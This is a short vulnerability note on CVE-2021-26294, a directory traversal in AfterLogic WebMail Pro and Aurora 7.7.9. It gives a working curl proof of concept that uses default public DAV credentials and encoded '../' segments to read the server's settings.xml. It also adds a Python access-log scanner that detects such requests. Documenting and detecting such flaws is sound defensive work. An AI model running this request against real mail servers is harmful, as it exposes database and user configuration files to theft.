WebMail Pro 7.7.9 Directory Traversal (CVE-2021-26294).md
576 B / 2021-05-21 09:14:38
# WebMail Pro 7.7.9 Directory Traversal (CVE-2021-26294)
AfterLogic Aurora and WebMail Pro 7.7.9 and all earlier versions are affected: an unauthorized attacker can read files such as the database and user configuration files.
PoC:
```
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
```
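As an added detection example (not part of the original note or of AfterLogic's code): a Python scan over access-log lines that percent-decodes each request path, collapses duplicate slashes, and flags `..` segments under the `/dav/server.php/files/` endpoint, which is the pattern the PoC above relies on. The log lines are constructed for illustration and the endpoint prefix is an assumption.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined style); the third line
# mirrors the encoded traversal from the PoC, the fourth uses a second encoding style.
SAMPLE_LOG = """\
203.0.113.5 - - [21/May/2021:09:14:38 +0000] "GET /dav/server.php/files/personal/notes.txt HTTP/1.1" 200 512
203.0.113.5 - - [21/May/2021:09:14:40 +0000] "GET /index.php HTTP/1.1" 200 1024
203.0.113.7 - - [21/May/2021:09:15:02 +0000] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 200 2048
203.0.113.9 - - [21/May/2021:09:15:10 +0000] "GET /dav/server.php/files/personal/..%2f..%2fdata/settings/settings.xml HTTP/1.1" 403 0
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def normalize_path(raw):
    """Percent-decode repeatedly (catches %252e double encoding), then
    collapse runs of slashes so every '..' becomes its own path segment."""
    decoded = raw
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return re.sub(r"/+", "/", decoded)

def is_dav_traversal(path, prefix="/dav/server.php/files/"):
    """True when a request under the DAV files endpoint (assumed prefix)
    still contains a '..' segment after normalization, i.e. it tries to
    escape the per-user file root."""
    norm = normalize_path(path.split("?", 1)[0])
    if not norm.startswith(prefix):
        return False
    return any(seg == ".." for seg in norm.split("/"))

def find_traversal_requests(log_text):
    """Return (client_ip, status, normalized_path) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        status = line.rsplit('" ', 1)[1].split()[0]
        if is_dav_traversal(m.group("path")):
            hits.append((ip, status, normalize_path(m.group("path"))))
    return hits
```

A 200 on a flagged request is the case to triage first, since it indicates the traversal was served rather than rejected.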
ref:
* https://nvd.nist.gov/vuln/detail/CVE-2021-26294
* https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md